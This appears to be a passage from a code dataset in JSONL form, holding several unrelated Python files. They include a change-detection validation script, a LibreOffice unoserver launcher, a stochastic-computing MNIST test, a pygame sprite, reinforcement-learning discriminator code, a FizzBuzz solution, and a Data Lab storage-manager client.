:]))\n if idx % 10 == 0:\n similar_dis_map_colorize = cv2.applyColorMap(np.uint8(255 * similar_distance_map_rz[0][0].cpu()),\n cv2.COLORMAP_BONE)\n save_change_map_dir_layer = os.path.join(save_change_map_dir, layer_flag)\n check_dir(save_change_map_dir_layer)\n change_map_dir = os.path.join(save_change_map_dir_layer, filename + '.jpg')\n cv2.imwrite(change_map_dir, similar_dis_map_colorize)\n return similar_distance_map_rz.data.cpu().numpy()\n\ndef validate(net_CD, val_dataloader, epoch, save_change_map_dir, save_roc_dir):\n net_CD.eval()\n cont_conv_total, total_count = 0.0, 0.0\n metric_for_conditions = init_metric_for_class_for_cmu(1)\n\n for idx, batch in enumerate(val_dataloader):\n image1, image2, label, name, height, width = batch\n height, width, name = height.numpy()[0], width.numpy()[0], name[0]\n image1, image2, label = Variable(image1.cuda()), Variable(image2.cuda()), Variable(label.cuda())\n image1_norm, image2_norm, label_norm = image1 / 255.0, image2 / 255.0, label / 255.0\n\n out_conv = net_CD(image1, image2)\n out_t0_conv, out_t1_conv = out_conv\n\n conv_distance = single_layer_heatmap_visual(out_t0_conv, out_t1_conv, save_change_map_dir, name, key, 'l2', idx)\n cont_conv = mc.RMS_Contrast(conv_distance)\n\n cont_conv_total += cont_conv\n\n total_count += 1\n\n prob_change = conv_distance[0][0]\n gt = label_norm.data.cpu().numpy()\n FN, FP, posNum, negNum = mc.eval_image_rewrite(gt[0], prob_change, cl_index=1)\n metric_for_conditions[0]['total_fp'] += FP\n metric_for_conditions[0]['total_fn'] += FN\n metric_for_conditions[0]['total_posnum'] += posNum\n metric_for_conditions[0]['total_negnum'] += negNum\n cont_conv_mean = cont_conv_total / total_count\n\n thresh = np.array(range(0,256)) / 255.0\n conds = metric_for_conditions.keys()\n for cond_name in conds:\n total_posnum = metric_for_conditions[cond_name]['total_posnum']\n total_negnum = metric_for_conditions[cond_name]['total_negnum']\n total_fp = metric_for_conditions[cond_name]['total_fp']\n total_fn = metric_for_conditions[cond_name]['total_fn']\n metric_dict = mc.pxEval_maximizeFMeasure(total_posnum,total_negnum, total_fn, total_fp, thresh=thresh)\n metric_for_conditions[cond_name].setdefault('metric', metric_dict)\n metric_for_conditions[cond_name].setdefault('contrast_conv', cont_conv_mean)\n\n\n f_score_total = 0.0\n for cond_name in conds:\n pr, rec, f_score = metric_for_conditions[cond_name]['metric']['precision'], metric_for_conditions[cond_name]['metric']['recall'], metric_for_conditions[cond_name]['metric']['MaxF']\n roc_save_epoch_dir = os.path.join(save_roc_dir, str(epoch))\n check_dir(roc_save_epoch_dir)\n mc.save_PTZ_metric2disk(metric_for_conditions[cond_name], roc_save_epoch_dir)\n roc_save_dir = roc_save_epoch_dir + '_' + str(cond_name) + '_roc.png'\n mc.plotPrecisionRecall(pr, rec, roc_save_dir, benchmark_pr=None)\n f_score_total += f_score\n\n print(f_score_total / (len(conds)))\n return f_score_total/len(conds)\n\n\nif __name__ == '__main__':\n\n datas, trainloader, valloader = train_dataset('CDD', crop_size=cfg.INPUT_SIZE, batch_size=cfg.BATCH_SIZE,\n num_workers=cfg.num_workers)\n\n weights = torch.FloatTensor(datas['weights']).cuda()\n\n import model.BSFNet as models\n\n net_CD = models.SiameseNet()\n criterion_CD = ls.BCL_v2()\n criterion_auxillary = ls.BCLwithUncertainty_v1()\n criterion_iou = ls.IOUloss_v2()\n\n if cuda:\n net_CD.cuda()\n criterion_CD.cuda()\n criterion_auxillary.cuda()\n criterion_iou.cuda()\n\n learning_rate = 1e-4\n optimizer_CD = torch.optim.Adam(net_CD.parameters(), lr=learning_rate, betas=(cfg.b1, cfg.b2))\n\n\n load_checkpoint = torch.load(cfg.SAVE_PATH + '.pth')\n net_CD.load_state_dict(load_checkpoint['net_CD'])\n EPOCH = load_checkpoint['epoch']\n load_best_metric = load_checkpoint['metric']\n print('load_cd_epoch = %d' % (EPOCH))\n start_epoch = EPOCH\n key = 'bsfnet_best'\n\n save_result_path = os.path.join(cfg.SAVE_PATH, 'test')\n check_dir(save_result_path)\n save_image_path = os.path.join(save_result_path, 'imgs')\n check_dir(save_image_path)\n save_roc_path = os.path.join(save_result_path, 'roc')\n check_dir(save_roc_path)\n\n current_metric = validate(net_CD, valloader, start_epoch, save_image_path, save_roc_path)\n\n","sub_path":"cd_code/test code.py","file_name":"test code.py","file_ext":"py","file_size_in_byte":5999,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"164870397","text":"import argparse\nimport logging\nimport os\nimport signal\nimport subprocess\nimport tempfile\nfrom urllib import request\n\nlogging.basicConfig()\nlogger = logging.getLogger(\"unoserver\")\nlogger.setLevel(logging.INFO)\n\n\nclass UnoServer:\n def __init__(self, interface=\"127.0.0.1\", port=\"2002\"):\n self.interface = interface\n self.port = port\n\n def start(self, daemon=False, executable=\"libreoffice\"):\n logger.info(\"Starting unoserver.\")\n\n with tempfile.TemporaryDirectory() as tmpuserdir:\n\n connection = (\n \"socket,host=%s,port=%s,tcpNoDelay=1;urp;StarOffice.ComponentContext\"\n % (self.interface, self.port)\n )\n\n # Store this as an attribute, it helps testing\n self.tmp_uri = \"file://\" + request.pathname2url(tmpuserdir)\n\n # I think only --headless and --norestore are needed for\n # command line usage, but let's add everything to be safe.\n cmd = [\n executable,\n \"--headless\",\n \"--invisible\",\n \"--nocrashreport\",\n \"--nodefault\",\n \"--nologo\",\n \"--nofirststartwizard\",\n \"--norestore\",\n f\"-env:UserInstallation={self.tmp_uri}\",\n f\"--accept={connection}\",\n ]\n\n logger.info(\"Command: \" + \" \".join(cmd))\n process = subprocess.Popen(cmd)\n\n def sigterm_handler(signum, frame):\n logger.info(\"Exiting on termination signal\")\n process.terminate()\n return\n\n signal.signal(signal.SIGTERM, sigterm_handler)\n\n if not daemon:\n try:\n process.wait()\n except KeyboardInterrupt:\n logger.info(\"Exiting on termination signal\")\n process.terminate()\n return\n\n else:\n return process\n\n\ndef main():\n parser = argparse.ArgumentParser(\"unoserver\")\n parser.add_argument(\n \"--interface\", default=\"127.0.0.1\", help=\"The interface used by the server\"\n )\n parser.add_argument(\"--port\", default=\"2002\", help=\"The port used by the server\")\n parser.add_argument(\"--daemon\", action=\"store_true\", help=\"Deamonize the server\")\n parser.add_argument(\n \"--executable\",\n default=\"libreoffice\",\n help=\"The path to the LibreOffice executable\",\n )\n args = parser.parse_args()\n\n server = UnoServer(args.interface, args.port)\n # If it's daemonized, this returns the process.\n # It returns 0 of getting killed in a normal way.\n # Otherwise it returns 1 after the process exits.\n process = server.start(daemon=True, executable=args.executable)\n if args.daemon:\n return process\n pid = process.pid\n process.wait()\n try:\n # Make sure it's really dead\n os.kill(pid, 0)\n # It was killed\n return 0\n except OSError as e:\n if e.errno == 3:\n # All good, it was already dead.\n return 0\n raise\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"src/unoserver/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":3148,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"119791958","text":"from snn.bnLayer import BNModel\nfrom keras.layers import Conv2D, Activation, MaxPooling2D, Dense, Flatten\nfrom keras import regularizers\nfrom keras import backend as K\nfrom keras.callbacks import Callback\nimport keras\nfrom keras.datasets import mnist\nfrom keras.utils.generic_utils import get_custom_objects\nimport numpy as np\nimport snn.hoUtils as hoU\nimport snn.hoModel as hoM\nimport snn.hoLayer as hoL\nimport global_variables\nimport WeightScale\n\n\nglobal_variables.DefineGlobalVariables()\n\n\ndef first_layer_activation(x):\n return K.tanh(x)\n\n\ndef load_data():\n num_classes = 10\n # the data, shuffled and split between train and test sets\n (x_train, y_train), (x_test, y_test) = mnist.load_data()\n\n x_train = x_train.astype('float32')\n x_test = x_test.astype('float32')\n x_train /= 255\n x_test /= 255\n\n img_rows = x_train.shape[1]\n img_cols = x_train.shape[2]\n\n # convert class vectors to binary class matrices\n y_train = keras.utils.to_categorical(y_train, num_classes)\n y_test = keras.utils.to_categorical(y_test, num_classes)\n\n if K.image_data_format() == 'channels_first':\n x_train = x_train.reshape(x_train.shape[0], 1, img_rows, img_cols)\n x_test = x_test.reshape(x_test.shape[0], 1, img_rows, img_cols)\n else:\n x_train = x_train.reshape(x_train.shape[0], img_rows, img_cols, 1)\n x_test = x_test.reshape(x_test.shape[0], img_rows, img_cols, 1)\n return (x_train, y_train, x_test, y_test)\n\n\nget_custom_objects().update({'first_layer_activation': Activation(first_layer_activation)})\n(x_train, y_train, x_test, y_test) = load_data()\n\ninput_shape = x_train.shape[1:]\nprint(input_shape)\n\nglobal_variables.bnModel = BNModel(8)\nglobal_variables.bnModel.SetId(1)\nglobal_variables.bnModel[0] = Conv2D(3, kernel_size=(5, 5), input_shape=input_shape, use_bias=False, kernel_regularizer=regularizers.l1(0.001))\nglobal_variables.bnModel[1] = Activation('first_layer_activation')\nglobal_variables.bnModel[2] = MaxPooling2D(pool_size=(2, 2))\nglobal_variables.bnModel[3] = Flatten()\nglobal_variables.bnModel[4] = Dense(100)\nglobal_variables.bnModel[5] = Activation('relu')\nglobal_variables.bnModel[6] = Dense(10)\nglobal_variables.bnModel[7] = Activation('softmax')\nglobal_variables.bnModel.LoadLayers()\nglobal_variables.bnModel.Compile(loss=keras.losses.mse, optimizer=keras.optimizers.Adadelta(), metrics=['accuracy'])\nglobal_variables.bnModel.Fit(x_train, y_train, batch_size=128, epochs=1, verbose=1, callbacks=[WeightScale.WeightScale()], validation_data=(x_test, y_test))\n\nglobal_variables.bnModel.Load_weights('../results/#Epoch1_weights_of_1st_model_network_test.h5')\nglobal_variables.bnModel.Evaluate(x_test, y_test, verbose=1, indexModel=1)\nglobal_variables.bnModel.OptimizeNetwork('network_test', '../results/#Epoch1_weights_of_1st_model_network_test.h5',\n '../results/#Epoch1_weights_of_1st_model_network_test.h5',\n WeightScale,\n cntIter=1,\n tupleLayer=(1, ),\n x_train=x_train,\n y_train=y_train,\n x_test=x_test,\n y_test=y_test,\n epochs=1,\n batch_size=128)\n\nkBits = 10\nlength = 2**kBits\n\nut=hoU.HOUtils(kBits=kBits)\nmodel = global_variables.bnModel.GetModel()\nweight_1_SNs, bias_1_SNs, listIndex1 = ut.GetConvolutionLayerWeightsBiasesSN(model, 1, Adaptive=\"True\")\n\n#dense_1_weight_SNs= ut.GetConnectedLayerWeightsSN(model, 5)\n#dense_1_biases= ut.GetConnectedLayerBiases(model, 5)\ndense_1_weight_SNs, dense_1_biases_SNs, listIndexDense = ut.GetConnectedLayerWeightsBiasesSN(model, 5, Adaptive=\"True\")\n\ndense_2_weights= ut.GetConnectedLayerWeights(model, 7)\ndense_2_biases= ut.GetConnectedLayerBiases(model, 7)\n\n\ncorrect_predictions = 0\nSN_input_matrix = np.full((28, 28, length), False)\nfor i in range(10000):\n print(\"test image:\", i)\n x = x_test[i]\n for j in range(28):\n for k in range(28):\n SN_input_matrix[j, k] = ut.CreateSN(x[0, j, k])\n\n hoModel = hoM.HOModel(SN_input_matrix, kBits=kBits)\n hoModel.SetNumOutputPlanes(3)\n hoModel.SetWeights(weight_1_SNs)\n hoModel.SetZeroBias(3)\n hoModel.SetListIndex(listIndex1)\n hoConvLayer = hoL.HOConvolution(5, 5, kBits=kBits, use_bias=\"False\", baseMode=\"Mux\", activationFunc=\"STanh\")\n hoModel.Activation(hoConvLayer, stride=1)\n hoMaxLayer = hoL.HOMaxPoolingExact(2, 2, kBits=kBits)\n hoModel.Activation(hoMaxLayer, stride=2)\n hoModel.SetNumOutputPlanes(1)\n hoModel.SetDenseWeights(dense_1_weight_SNs)\n hoModel.SetDenseBias(dense_1_biases_SNs)\n hoModel.SetListIndexDense(listIndexDense)\n hoDenseLayer = hoL.HOConnected(kBits=kBits, use_bias=\"True\", stochToInt=\"APC\", activationFunc=\"Relu\")\n hoModel.Activation(hoDenseLayer, num_classes=100)\n output = hoModel.GetOutputMatrix()\n output = ut.BinaryConnectedLAyer(100, 10, output, dense_2_weights, dense_2_biases)\n\n if (np.argmax(output) == np.argmax(y_test[i])):\n correct_predictions = correct_predictions + 1\n\n print(\"accuracy:\", correct_predictions/(i+1))","sub_path":"test/network_test2.py","file_name":"network_test2.py","file_ext":"py","file_size_in_byte":5313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"287985647","text":"from pygame.locals import *\nimport pygame\nimport math\nfrom time import sleep\n\nclass Ball(pygame.sprite.Sprite):\n #Starting position and speed\n speed = 6\n\n def __init__(self):\n super().__init__()\n self.image = pygame.Surface([250, 250])\n self.image = pygame.image.load(\"images/Ball.png\").convert_alpha()\n self.rect = self.image.get_rect(center=(10, 350))\n self.rect.bottom = 770\n self.rect.x = 269.5\n self.rect.y = 369.5\n","sub_path":"Examples/Ball.py","file_name":"Ball.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"233548544","text":"\n\n\n\n\n\n\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport torch.optim.lr_scheduler as lr_scheduler\nfrom torch.autograd import Variable\nfrom torch.utils.data.sampler import BatchSampler, SubsetRandomSampler\n\n\n\n\n\n\n\ndef discrim_predictions(model_dict, states, actions, discriminator, reverse=False):\n\n #rollouts has states, actions, dones of n-step\n #discriminator takes two frames, predicts an action\n #this func will use discrim to make preds and compute the error of those preds \n #then return the errors for each timestep\n #then those errors will be used to optimze the discrim and agent \n\n\n #How to deal with last timestep if doing 2-timestep pred? \n #Maybe ill just combine with 1-step\n #Ya make the step number be changeable \n #note that this is different from the n-step for computing the return\n\n #will be averaging over n-step prediction errors\n\n n_steps = model_dict['num_steps'] #this is the episode length basically\n n_processes = model_dict['num_processes'] #this is the episode length basically\n\n max_pred_step = 3 #5\n #list for each n-step\n errors = [[] for i in range(max_pred_step)]\n\n\n\n # states = torch.cuda.FloatTensor(states) #.cuda() #[S+1,P,stack,84,84]\n # actions = torch.cuda.LongTensor(actions) #.cuda() #[S,P,1]\n\n # print (states.size())\n # print (actions.size())\n # faads\n\n if reverse:\n idx = [i for i in range(n_steps, -1, -1)]\n idx = torch.LongTensor(idx).cuda()\n states = states.index_select(0, idx)\n idx = [i for i in range(n_steps-1, -1, -1)]\n idx = torch.LongTensor(idx).cuda()\n actions = actions.index_select(0, idx)\n # else:\n # states = rollouts.states\n # actions = rollouts.actions\n\n # print (torch.sum(states[0]))\n # print (torch.sum(states[-1]))\n\n # print (states.size())\n\n for s in range(1,max_pred_step+1):\n\n for t in range(n_steps):\n\n # get states for this action and n-step\n #first state is state of action, final state is n-step away\n # print (rollouts.states[t].size()) #[P,stack,84,84]\n # print (rollouts.actions[t].size()) #[P,1]\n \n\n if t+s <= n_steps:\n\n # print (t, 't')\n\n #take last one in the stack, which is the newest frame\n first_frame = states[t][:,-1].contiguous().view(n_processes,1,84,84) #[P,1,84,84]\n # print (first_frame.size())\n final_frame = states[t+s][:,-1].contiguous().view(n_processes,1,84,84)\n\n action = Variable(actions[t])\n\n discrim_error = discriminator.forward(first_frame, final_frame, action)\n\n errors[s-1].append(discrim_error)\n\n # else:\n # fdsfas\n #insert zero if less than n-step states left\n #maybe not, it just wont be averaged over this step\n\n\n #LOOK at episode completion!!-\n # print ('len')\n # print (len(errors))\n # print (len(errors[0]))\n # print (len(errors[1]))\n \n\n #average the errors\n avg_errors = []\n for t in range(n_steps):\n\n # print (t, 't')\n\n count = 0\n for s in range(max_pred_step):\n\n # print (s, 's')\n\n\n if s == 0:\n errors_sum = errors[s][t]\n count = 1\n else:\n if t < len(errors[s]):\n errors_sum += errors[s][t]\n count+=1\n\n # print (count)\n avg_error = errors_sum / count\n avg_errors.append(avg_error)\n\n # print (len(avg_errors)) #[S,P]\n avg_errors = torch.stack(avg_errors)#[S,P]\n # print (avg_errors.size())#[S,P]\n # fdsfa\n\n #still missing that Im not looking at episode completion. ..\n\n if reverse:\n idx = [i for i in range(n_steps-1, -1, -1)]\n idx = torch.LongTensor(idx).cuda()\n avg_errors = avg_errors.index_select(0, Variable(idx))\n\n return avg_errors\n\n\n \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"RL4/rl_mar2018_7_deepq/discrim_preds.py","file_name":"discrim_preds.py","file_ext":"py","file_size_in_byte":4094,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"606529155","text":"class Solution(object):\n def fizzBuzz(self, n, ):\n \"\"\"\n\n :type n: int\n :rtype: List[str]\n \"\"\"\n ret = list()\n\n for i in range(1, n + 1):\n if not i % 3:\n if not i % 5:\n ret.append('FizzBuzz')\n else:\n ret.append('Fizz')\n elif not i % 5:\n ret.append('Buzz')\n else:\n ret.append(str(i))\n return ret\n\n\ndef main():\n solution = Solution()\n ret = solution.fizzBuzz()\n print(ret)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"simple/412_fizz_buzz.py","file_name":"412_fizz_buzz.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"212250477","text":"#!/usr/bin/env python\n#\n# STORECLIENT -- Client routines for the Data Lab Store Manager Service\n#\n\nfrom __future__ import print_function\n\n__authors__ = 'Matthew Graham , Mike Fitzpatrick , Data Lab '\n__version__ = '20170430' # yyyymmdd\n\n\n\"\"\"\n Client routines for the DataLab store manager service\n\nImport via\n\n.. code-block:: python\n\n from dl import storeClient\n\"\"\"\n\nimport os, sys\nimport fnmatch, glob\nimport requests\nfrom io import StringIO\t\t# Python 2/3 compatible\nimport json\n\n\n#####################################\n# Store manager client procedures\n#####################################\n\n\nDEF_SERVICE_URL = \"http://dlsvcs.datalab.noao.edu/storage\"\nPROFILE = \"default\"\nDEBUG = False\n\n\nclass storeClientError (Exception):\n def __init__(self, message):\n self.message = message\n\n\n# Pretty-printer for file sizes.\ndef sizeof_fmt(num):\n for unit in ['B','K','M','G','T','P','E','Z']:\n if abs(num) < 1024.0:\n if unit == 'B':\n return \"%5d%s\" % (num, unit)\n else:\n return \"%3.1f%s\" % (num, unit)\n num /= 1024.0\n return \"%.1f%s\" % (num, 'Y')\n\n\n\n# GET -- Retrieve a file from the store manager service\ndef get(token, fr, to, verbose=True):\n \"\"\"\n Retrieve a file from the store manager service\n \"\"\"\n debug = False\n headers = {'X-DL-AuthToken': token}\n\n # Patch the names with the URI prefix if needed.\n nm = (fr if fr.startswith(\"vos://\") else (\"vos://\" + fr))\n\n if debug:\n print (\"get: nm = %s\" % nm)\n if hasmeta(fr):\n if not os.path.isdir(to):\n raise storeClientError(\"Location must be specified as a directory\")\n if to == '':\n raise storeClientError(\n \"Multi-file requests require a download location\")\n\n if to != '':\n flist = expandFileList(token, nm, \"csv\", full=True)\n if debug: print (\"get: flist = %s\" % flist)\n nfiles = len(flist)\n fnum = 1\n resp = []\n for f in flist:\n junk, fn = os.path.split(f)\n if to.endswith(\"/\"):\n dlname = ((to + fn) if hasmeta(fr) else to)\n else:\n dlname = ((to + \"/\" + fn) if hasmeta(fr) else to)\n\n url = requests.get(DEF_SERVICE_URL + \"/get?name=%s\" % f,\n headers=headers)\n\n if url.status_code != 200:\n resp.append(\"Error: \" + url.text)\n else:\n r = requests.get(url.text, stream=True)\n clen = r.headers.get('content-length')\n total_length = (0 if clen is None else int(clen))\n\n dl = 0\n with open(dlname, 'wb', 0) as fd:\n for chunk in r.iter_content(chunk_size=1024):\n dl += len (chunk)\n if chunk:\n fd.write(chunk)\n if total_length > 0:\n done = int(20 * dl / total_length)\n\n if verbose:\n # Print a progress indicator\n sys.stdout.write (\"\\r(%d/%d) [%s%s] [%7s] %s\" % \\\n (fnum, nfiles, '=' * done, ' ' * (20-done),\n sizeof_fmt(dl), f[6:]))\n sys.stdout.flush()\n\n # Handle a zero-length file download.\n if verbose:\n if dl == 0:\n print (\"\\r(%d/%d) [%s] [%7s] %s\" % \\\n (fnum, nfiles, '=' * 20, \"0 B\", f[6:]))\n else:\n print('')\n fd.close()\n resp.append(r)\n fnum += 1\n\n return str(resp)\n\n else:\n url = requests.get(DEF_SERVICE_URL + \"/get?name=%s\" % nm,\n headers=headers)\n r = requests.get(url.text, stream=False, headers=headers)\n return r.content\n\n\n# PUT -- Upload a file to the store manager service\ndef put(token, fr, to, verbose=True):\n \"\"\"\n Upload a file to the store manager service\n \"\"\"\n debug = False\n headers = {'X-DL-AuthToken': token}\n\n # If the 'to' is a directory, create it first and then transfer the\n # contents.\n if os.path.isdir (fr):\n if fr.endswith(\"/\"):\n dname = (to if to.startswith(\"vos://\") else to[:-1])\n mkdir (token, dname)\n flist = glob.glob(fr+\"/*\")\n else:\n dname = ''\n flist = [fr]\n\n if debug:\n print (\"fr=%s to=%s dname=%s\" % (fr, to, dname))\n print (flist)\n\n nfiles = len(flist)\n fnum = 1\n resp = []\n for f in flist:\n\n fr_dir, fr_name = os.path.split(f)\n\n # Patch the names with the URI prefix if needed.\n nm = (to if to.startswith(\"vos://\") else (\"vos://\" + to))\n if to.endswith(\"/\"):\n nm = nm + fr_name\n\n if debug:\n print (\"put: f=%s nm=%s\" % (f,nm))\n\n if not os.path.exists(f):\n # Skip files that don't exist\n print (\"Error: file '%s' does not exist\" % f)\n continue\n\n r = requests.get(DEF_SERVICE_URL + \"/put?name=%s\" % nm, headers=headers)\n\n # Cannot upload directly to a container\n # if r.status_code == 500 and r.content == \"Data cannot be uploaded to a\n # container\":\n if r.status_code == 500:\n file = fr[fr.rfind('/') + 1:]\n nm += '/%s' % f\n r = requests.get(DEF_SERVICE_URL + \"/put?name=%s\" % nm, \n headers=headers)\n file = open(f).read()\n\n try:\n if verbose:\n sys.stdout.write (\"(%d / %d) %s -> \" % (fnum, nfiles, f))\n\n # FIXME -- Will this work for really large files?\n requests.put(r.content, data=file,\n headers={'Content-type': 'application/octet-stream',\n 'X-DL-AuthToken': token})\n if verbose:\n print (\"%s\" % nm)\n\n except Exception as e:\n #raise storeClientError(e.message)\n resp.append (e.message)\n else:\n resp.append (\"OK\")\n\n fnum += 1\n\n\n# CP -- Copy a file/directory within the store manager service\ndef cp(token, fr, to, verbose=False):\n \"\"\"\n Copy a file/directory within the store manager service\n \"\"\"\n # Patch the names with the URI prefix if needed.\n src = (fr if fr.startswith(\"vos://\") else (\"vos://\" + fr))\n dest = (to if to.startswith(\"vos://\") else (\"vos://\" + to))\n\n # If the 'from' string has no metacharacters we're copying a single file,\n # otherwise expand the file list and process the matches individually.\n if not hasmeta(fr):\n r = getFromURL(\"/cp?from=%s&to=%s\" % (src, dest), token)\n return r\n else:\n flist = expandFileList(token, src, \"csv\", full=True)\n nfiles = len(flist)\n fnum = 1\n resp = []\n for f in flist:\n junk, fn = os.path.split (f)\n to_fname = dest + ('/%s' % fn)\n if verbose:\n print (\"(%d / %d) %s -> %s\" % (fnum, nfiles, f, to_fname))\n r = getFromURL(\"/cp?from=%s&to=%s\" % (f, to_fname), token)\n fnum += 1\n resp.append(r)\n return resp\n\n\n# LN -- Create a link to a file/directory in the store manager service\ndef ln(token, fr, target):\n \"\"\"\n Create a link to a file/directory in the store manager service\n \"\"\"\n try:\n r = getFromURL(\"/ln?from=%s&to=%s\" % (fr, target), token)\n except Exception:\n raise storeClientError(r.content)\n else:\n return \"OK\"\n\n\n# LS -- Get a file/directory listing from the store manager service\ndef ls(token, name, format='csv'):\n \"\"\"\n Get a file/directory listing from the store manager service\n\n Parameters\n ----------\n token : str\n Secure token obtained via :func:`dl.auth.login`\n\n name : str\n Valid name of file or directory, e.g. ``vos://somedir``\n\n .. todo:: [20161110] currently doesn't seem to work.\n\n format : str\n Default ``str``.\n\n Example\n -------\n\n .. code-block:: python\n\n listing = dl.storeClient.ls(token,name='vos://somedir')\n print listing\n\n This prints for instance:\n\n .. code::\n\n bar2.fits,foo1.csv,fancyfile.dat\n\n \"\"\"\n flist = expandFileList(token, name, format, full=False)\n if (format == 'csv'):\n result = \",\".join(flist)\n return (result[1:] if result.startswith(\",\") else result)\n\n else:\n results = []\n for f in flist:\n url = DEF_SERVICE_URL + \"/ls?name=vos://%s&format=%s\" % (f, format)\n r = requests.get(url, headers={'X-DL-AuthToken': token})\n results.append(r.content)\n\n return \"\\n\".join(results)\n\n\n# MKDIR -- Create a directory in the store manager service\ndef mkdir(token, name):\n \"\"\" \n Create a directory in the storage manager service\n \"\"\"\n try:\n r = getFromURL(\"/mkdir?dir=%s\" % name, token)\n except Exception:\n raise storeClientError(r.content)\n else:\n return \"OK\"\n\n\n# MV -- Move/rename files/directories within the store manager service\ndef mv(token, fr, to, verbose=False):\n \"\"\"\n Move/rename files/directories within the store manager service\n \"\"\"\n\n # Patch the names with the URI prefix if needed.\n src = (fr if fr.startswith(\"vos://\") else (\"vos://\" + fr))\n dest = (to if to.startswith(\"vos://\") else (\"vos://\" + to))\n\n # If the 'from' string has no metacharacters we're copying a single file,\n # otherwise expand the file list on the and process the matches\n # individually.\n if not hasmeta(fr):\n r = getFromURL(\"/mv?from=%s&to=%s\" % (src, dest), token)\n return r\n else:\n flist = expandFileList(token, src, \"csv\", full=True)\n nfiles = len(flist)\n fnum = 1\n resp = []\n for f in flist:\n junk, fn = os.path.split (f)\n to_fname = dest + ('/%s' % fn)\n if verbose:\n print (\"(%d / %d) %s -> %s\" % (fnum, nfiles, f, to_fname))\n r = getFromURL(\"/mv?from=%s&to=%s\" % (f, to_fname), token)\n fnum += 1\n resp.append(r)\n return resp\n\n\n# RM -- Delete one or more files file from the store manager service.\ndef rm(token, name, verbose=False):\n \"\"\"\n Delete one or more files from the store manager service.\n \"\"\"\n\n # Patch the names with the URI prefix if needed.\n nm = (name if name.startswith(\"vos://\") else (\"vos://\" + name))\n\n # If the 'name' string has no metacharacters we're copying a single file,\n # otherwise expand the file list on the and process the matches\n # individually.\n if not hasmeta(nm):\n r = getFromURL(\"/rm?file=%s\" % nm, token)\n return r\n else:\n flist = expandFileList(token, nm, \"csv\", full=True)\n nfiles = len(flist)\n fnum = 1\n resp = []\n for f in flist:\n if verbose:\n print (\"(%d / %d) %s\" % (fnum, nfiles, f))\n r = getFromURL(\"/rm?file=%s\" % f, token)\n fnum += 1\n resp.append(r)\n return resp\n\n\n# RMDIR -- Delete a directory from the store manager service\ndef rmdir(token, name):\n \"\"\"\n Delete a directory from the store manager service\n \"\"\"\n try:\n saveAs (token, \"deleted\", name+\"/.deleted\")\n r = getFromURL(\"/rmdir?dir=%s\" % name, token)\n except Exception:\n raise storeClientError(r.content)\n else:\n return \"OK\"\n\n\n# SAVEAS -- Save the string representation of a data object as a file.\ndef saveAs(token, data, name):\n \"\"\"\n Save the string representation of a data object as a file.\n \"\"\"\n\n import tempfile\n\n try:\n with tempfile.NamedTemporaryFile(delete=False) as tfd:\n tfd.write(str(data))\n tfd.flush()\n tfd.close()\n except Exception as e:\n raise storeClientError(e.message)\n\n # Patch the names with the URI prefix if needed.\n nm = (name if name.startswith(\"vos://\") else (\"vos://\" + name))\n\n # Put the temp file to the VOSpace.\n put(token, fr=tfd.name, to=nm, verbose=False)\n\n os.unlink(tfd.name) # Clean up\n\n return \"OK\"\n\n\n# TAG -- Annotate a file/directory in the store manager service\ndef tag(token, name, tag):\n \"\"\"\n Annotate a file/directory in the store manager service\n \"\"\"\n try:\n r = getFromURL(\"/tag?file=%s&tag=%s\" % (name, tag), token)\n except Exception:\n raise storeClientError (r.content)\n else:\n return \"OK\"\n\n\n# -------------------------------------------------------\n# Utility Methods\n# -------------------------------------------------------\n\ndef hasmeta(s):\n \"\"\" Determine whether a string contains filename meta-characters.\n \"\"\"\n return (s.find('*') >= 0) or (s.find('[') >= 0) or (s.find('?') > 0)\n\n\ndef expandFileList(token, pattern, format, full=False):\n \"\"\" Expand a filename pattern in a VOSpace URI to a list of files. We\n do this by getting a listing of the parent container contents from\n the service and then match the pattern on the client side.\n \"\"\"\n debug = False\n\n # The URI prefix is constant whether it's included in the pattern string\n # or not. The SM sm controls a specific instance of VOSpace so at the\n # moment the expansiom to the VOSpace URI is handled on the server. We'll\n # prepend this to the service call as needed to ensure a correct argument\n # and give the calling routine the option of leaving it off.\n uri = 'vos://'\n str = (pattern[6:] if pattern.startswith('vos://') else pattern)\n\n # Extract the directory and filename/pattern from the string.\n dir, name = os.path.split(str)\n if debug:\n print (\"-----------------------------------------\")\n print (\"PATTERN = '\" + str + \"'\")\n print ('str = ' + str)\n print (\"split: '%s' '%s'\" % (dir, name))\n\n pstr = (name if (name is not None and hasmeta(name)) else \"*\")\n\n if dir is not None:\n if dir == \"/\" and name is not None:\n dir = dir + name\n else:\n if dir.endswith(\"/\"):\n dir = dir[:-1] # trim trailing '/'\n if not dir.startswith(\"/\"):\n dir = \"/\" + dir # prepend '/'\n else:\n dir = '/'\n if name is not None:\n dir = dir + name\n if dir == \"/\":\n dir = \"\"\n pstr = name\n if not hasmeta(name) and name is not None:\n pstr = (name if name != '' else \"*\")\n\n # Make the service call to get a listing of the parent directory.\n url = DEF_SERVICE_URL + \"/ls?name=vos://%s&format=%s\" % (dir, \"csv\")\n r = requests.get(url, headers={'X-DL-AuthToken': token})\n\n # Filter the directory contents list using the filename pattern.\n list = []\n flist = r.content.split(',')\n for f in flist:\n if fnmatch.fnmatch(f, pstr) or f == pstr:\n furi = (f if not full else (uri + dir + \"/\" + f))\n list.append(furi.replace(\"///\", \"//\"))\n\n if debug:\n print (url)\n print (\"%s --> '%s' '%s' '%s' => '%s'\" % (pattern, uri, dir, name, pstr))\n\n return sorted(list)\n\n\n# Get from a URL\ndef getFromURL(path, token):\n try:\n resp = requests.get(\"%s%s\" % (DEF_SERVICE_URL, path),\n 